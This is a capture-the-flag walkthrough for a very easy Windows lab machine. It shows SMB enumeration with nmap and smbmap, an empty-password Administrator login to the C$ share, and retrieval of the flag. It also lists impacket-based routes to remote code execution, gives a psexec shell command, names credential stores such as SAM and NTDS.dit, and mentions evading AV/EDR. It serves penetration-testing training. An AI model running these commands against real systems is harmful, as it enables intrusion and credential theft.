⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing

Tactics escalates the SMB knowledge from Dancing into a full Windows compromise. Here the Administrator account has no password set on a Windows host — but rather than just browsing shares, the attack reaches the C$ administrative share directly and ultimately leverages SMB to read the flag from the Administrator's desktop. This machine reinforces why administrator-level SMB access is a complete system compromise on Windows.

Tools: nmap · smbclient · smbmap  ·  Difficulty: Very Easy  ·  OS: Windows
01 — What You Will Learn
SkillWhy it matters
Enumerating SMB with smbmapsmbmap shows share permissions at a glance — faster than smbclient for initial recon
Accessing C$ administrative shareC$ gives full filesystem access when authenticated as admin — equivalent to local access
No-password Administrator on SMBA Windows host with an empty admin password on SMB is a complete compromise
Navigating the Windows filesystem via SMBRetrieving files from user desktops, AppData, and system paths via smbclient
02 — Reconnaissance
Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Windows 10 Pro

Classic Windows SMB fingerprint — ports 135, 139, 445. The OS is Windows 10 Pro. No other ports open, so SMB is the entire attack surface.

03 — Share Enumeration with smbmap

smbmap is faster than smbclient for getting an overview of shares and their permissions. Try the Administrator account with an empty password first.

List shares and permissions
smbmap -H 10.129.x.x -u Administrator -p ""
Output
Disk Permissions Comment ---- ----------- ------- ADMIN$ READ, WRITE Remote Admin C$ READ, WRITE Default share IPC$ READ ONLY Remote IPC

What you're seeing: READ, WRITE access to both ADMIN$ and C$ as Administrator with no password. This is a full system compromise — C$ maps directly to the root of the C drive.

⚠  Write access to C$ as Administrator means you can place executables anywhere on the system, modify the registry hive files, replace system binaries, and plant persistence mechanisms — all over SMB without ever getting a shell.
04 — Accessing C$ and Retrieving the Flag
Connect to the C$ share
smbclient \\\\10.129.x.x\\C$ -U Administrator --no-pass
Navigate to the Administrator desktop
smb: \> cd Users\Administrator\Desktop smb: \Users\Administrator\Desktop\> ls flag.txt A 34 smb: \Users\Administrator\Desktop\> get flag.txt smb: \Users\Administrator\Desktop\> exit
Read locally
cat flag.txt
✓ Submit the flag string to complete the machine.
05 — smbmap vs smbclient
smbmapsmbclient
Primary useQuick permission overview across all sharesInteractive file access inside a share
Best forInitial recon — "what can I access?"Browsing, downloading, uploading files
Recursive listingsmbmap -H host -u user -p pass -Rrecurse ON then ls
Download all filessmbmap --download share/pathmget * after prompt OFF
Empty password-p ""--no-pass or -N
06 — Escalation: SMB → Remote Code Execution

With admin SMB write access, there are multiple paths to RCE without needing any additional vulnerability:

TechniqueToolRequirement
PsExec-style executionimpacket-psexecAdmin write to ADMIN$ or C$
SMBExecimpacket-smbexecAdmin SMB access
WMIExecimpacket-wmiexecAdmin credentials + WMI enabled
Scheduled task creationnet use + schtasksWrite access to C$
Service creationsc.exe over SMBAdmin credentials
Example: PsExec shell via impacket
impacket-psexec Administrator:@10.129.x.x
07 — Key Takeaways
Admin SMB access with no password is a complete Windows system compromise. C$ access equals physical access — every file, every credential store, every configuration is readable and writable.
ConceptReal-world relevance
Empty admin password on SMBWindows machines in workgroups or with default builds frequently have this — always test before brute-forcing
C$ is full disk accessSAM, SYSTEM, NTDS.dit — all credential stores are in reach via C$ with admin access
smbmap for speedGets permissions across all shares in one command — essential for fast triage
Admin access = multiple RCE pathsPsExec, SMBExec, WMIExec all work — pick the one that evades AV/EDR in the specific environment